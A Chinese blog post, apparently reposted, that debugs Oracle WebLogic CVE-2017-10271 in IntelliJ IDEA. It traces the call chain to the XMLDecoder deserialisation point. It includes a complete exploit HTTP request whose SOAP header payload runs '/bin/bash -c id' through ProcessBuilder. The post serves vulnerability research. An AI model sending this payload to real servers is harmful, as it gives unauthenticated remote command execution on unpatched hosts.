码迷,mamicode.com
首页 > Web开发 > 详细

IDEA debug漏洞第一篇(weblogic,cve-2017-10271)

时间:2019-11-01 16:15:23      阅读:126      评论:0      收藏:0      [点我收藏+]

标签:voc   build   uil   schema   pip   ||   $2   super   RoCE   

在weblogic.wsee.jaxws.WLSServletAdapter的129行打点

1 if (var2.getMethod().equals("GET") || var2.getMethod().equals("HEAD")) {

然后开启debug模式,进行发包,截获断点处的请求包。

burp包内容:

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: localhost:7001
Content-Type: text/xml
Content-Length: 987

<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>id</string>
                        </void>
                    </array>
                    <void method="start" />
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body />
</soapenv:Envelope>

 

调用链(从下往上)

 技术图片

processRequest:43, WorkContextServerTube (weblogic.wsee.jaxws.workcontext)
__doRun:866, Fiber (com.sun.xml.ws.api.pipe)
_doRun:815, Fiber (com.sun.xml.ws.api.pipe)
doRun:778, Fiber (com.sun.xml.ws.api.pipe)
runSync:680, Fiber (com.sun.xml.ws.api.pipe)
process:403, WSEndpointImpl$2 (com.sun.xml.ws.server)
handle:539, HttpAdapter$HttpToolkit (com.sun.xml.ws.transport.http)
handle:253, HttpAdapter (com.sun.xml.ws.transport.http)
handle:140, ServletAdapter (com.sun.xml.ws.transport.http.servlet)
handle:171, WLSServletAdapter (weblogic.wsee.jaxws)
run:708, HttpServletAdapter$AuthorizedInvoke (weblogic.wsee.jaxws)
doAs:363, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:146, SecurityManager (weblogic.security.service)
authenticatedInvoke:103, ServerSecurityHelper (weblogic.wsee.util)
run:311, HttpServletAdapter$3 (weblogic.wsee.jaxws)
post:336, HttpServletAdapter (weblogic.wsee.jaxws)
doRequest:99, JAXWSServlet (weblogic.wsee.jaxws)
service:99, AbstractAsyncServlet (weblogic.servlet.http)
service:820, HttpServlet (javax.servlet.http)
run:227, StubSecurityHelper$ServletServiceAction (weblogic.servlet.internal)
invokeServlet:125, StubSecurityHelper (weblogic.servlet.internal)
execute:301, ServletStubImpl (weblogic.servlet.internal)
execute:184, ServletStubImpl (weblogic.servlet.internal)
wrapRun:3732, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
run:3696, WebAppServletContext$ServletInvocationAction (weblogic.servlet.internal)
doAs:321, AuthenticatedSubject (weblogic.security.acl.internal)
runAs:120, SecurityManager (weblogic.security.service)
securedExecute:2273, WebAppServletContext (weblogic.servlet.internal)
execute:2179, WebAppServletContext (weblogic.servlet.internal)
run:1490, ServletRequestImpl (weblogic.servlet.internal)
execute:256, ExecuteThread (weblogic.work)
run:221, ExecuteThread (weblogic.work)

 断点weblogic.wsee.jaxws.WLSServletAdapter的129行

技术图片

 然后进行下一步调试

因为我们是post请求,这个条件明显可以F8跳过。没必要跟入。

来到super.handle(var1, var2, var3);

步入

最后到

 技术图片

 

 

才是步入正题。

看看var1

 是我们的post内容

技术图片

 

 跟进this.readHeaderOld(var3);

查看var4

技术图片

 

 

真正的底层触发点
技术图片

 

 

 

IDEA debug漏洞第一篇(weblogic,cve-2017-10271)

标签:voc   build   uil   schema   pip   ||   $2   super   RoCE   

原文地址:https://www.cnblogs.com/ph4nt0mer/p/11775908.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!